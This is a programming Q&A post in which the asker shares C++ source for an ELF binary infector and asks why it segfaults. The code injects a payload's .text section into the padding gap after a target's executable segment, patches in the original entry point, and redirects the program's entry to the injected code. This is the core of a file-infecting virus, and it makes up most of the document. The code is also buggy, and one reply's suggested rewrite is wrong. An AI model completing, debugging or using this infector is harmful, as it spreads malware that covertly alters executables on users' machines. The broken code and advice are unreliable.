# segmentation core dump c++

Tags: c++, file, segmentation-fault, elf

```
#include <iostream>
#include <fcntl.h>
#include <sys/stat.h>
#include <elf.h>
#include <sys/mman.h>
#include <cstring>
#include <unistd.h>
#include <stdio.h>

int f_open(char *filename, void** data, int& len);
Elf64_Phdr *find_gap(void *d, int& p, int& len);
Elf64_Shdr *find_section(void *data, char *string);
int get_file_size(const int& fd);

int f_open(char* filename, void** data, int& len){
    int fd;
    fd = open(filename,O_APPEND|O_RDWR,0);
    if(fd <0)
        exit(3);
    std::cout<<fd;
    len = get_file_size(fd);
    std::cout<<len;
    if((*data = mmap(0, len, PROT_READ| PROT_WRITE| PROT_EXEC, MAP_SHARED, fd, 0)) == MAP_FAILED) {
        //printf(filename);
        exit(4);
    }
    return fd;
}

int get_file_size(const int& fd) {
    struct stat _info;

    fstat (fd, &_info);

    return _info.st_size;
}

Elf64_Phdr* find_gap(void *d,const int& size, int& p, int& len){
    Elf64_Ehdr *elf_hdr = (Elf64_Ehdr *) d;
    Elf64_Phdr *elf_seg, *text_seg;
    int n_seg = elf_hdr->e_phnum;
    int text_end, gap=size;

    elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_hdr + (unsigned int) elf_hdr->e_phoff);

    for (int i = 0; i < n_seg; i++)
    {
        if (elf_seg->p_type == PT_LOAD && elf_seg->p_flags & 0x011)
        {
            text_seg = elf_seg;
            text_end = elf_seg->p_offset + elf_seg->p_filesz;
        }
        else
        {
            if (elf_seg->p_type == PT_LOAD &&
                (elf_seg->p_offset - text_end) < gap)
            {
                gap = elf_seg->p_offset - text_end;
            }
        }
        elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_seg
                                  + (unsigned int) elf_hdr->e_phentsize);
    }

    p = text_end;
    len = gap;

    return text_seg;
}
Elf64_Shdr *find_section(void *data, char *name){
    char        *sname;
    int         i;
    Elf64_Ehdr* elf_hdr = (Elf64_Ehdr *) data;
    Elf64_Shdr *shdr = (Elf64_Shdr *)(data + elf_hdr->e_shoff);
    const char *sh_strtab_p = (char*)data + shdr[elf_hdr->e_shstrndx].sh_offset;

    for (i = 0; i < elf_hdr->e_shnum; i++)
    {
        sname = (char*) (sh_strtab_p + shdr[i].sh_name);
        if (!strcmp (sname, name))  return &shdr[i];
    }

    return NULL;
}
int mem_subst (void *m, int len, long pat, long val)
{
    unsigned char *p = (unsigned char*)m;
    long v;
    int r;

    for (int i = 0; i < len; i++)
    {
        v = *((long*)(p+i));
        r = v ^ pat; // Now I know how to XOR in C

        if (r ==0)
        {
            printf ("+ Pattern %lx found at offset %d -> %lx\n", pat, i, val);
            *((long*)(p+i)) = val;
            return 0;
        }
    }
    return -1;
}

int main(int argc, char** argv) {
    void *d,*d1;
    int target_fd, payload_fd;
    int fsize, fsize1;
    int p, len;

    if(argc!=3)
        exit(1);

    target_fd = f_open(argv[1],&d,fsize);


    Elf64_Ehdr *elf_hdr = (Elf64_Ehdr *) d;
    Elf64_Addr ep = elf_hdr->e_entry;

    Elf64_Phdr  *t_text_seg = find_gap(d, fsize, p, len);
    Elf64_Addr  *base = (Elf64_Addr *)(t_text_seg->p_vaddr);



    payload_fd = f_open(argv[2],&d1,fsize1);

    Elf64_Shdr *p_text_sec = find_section (d1, ".text");

    if (p_text_sec->sh_size > len)
    {
        fprintf (stderr, "- Payload to big, cannot infect file.\n");
        exit (2);
    }

    memmove (d + p, d1 + p_text_sec->sh_offset, p_text_sec->sh_size);

    mem_subst (d+p, p_text_sec->sh_size, 0x11111112, (long)ep);

    elf_hdr->e_entry = (Elf64_Addr) (base + p);

    close (payload_fd);
    close (target_fd);

    return 0;
}
```

Trying to make elf-infector but getting problem, file that should be infected becomes infected but I get segmentation coredump.
I think that problem is when I`m changing file that only readble but I dont know how o fix this.
I think that problem may occur in my function mem_subst
I've tried all sorts of variations to solve this problem and I am really at a loss. If anyone has any solution to this problem, it would be very appreciated.

Thanks

Comment: Running the program in the debugger that almost certainly came with your development environment will either help you find and solve your problem immediately or give you additional information that can make it easier for those of us out here to help you.

Comment: FYI, `v = *((long*)(p+i));` can be written more simply as `v = (long)p[i];`

Comment: See https://stackoverflow.com/a/8306805/583570 for how to examine core dump with gdb

Comment: In C++, you should generally use reference parameters rather than pointers. It makes the code much easier to read.

Comment: I get a bunch of compiler warnings about arithmetic on void pointers and one about de-`const`ing a string literal. Worth looking into.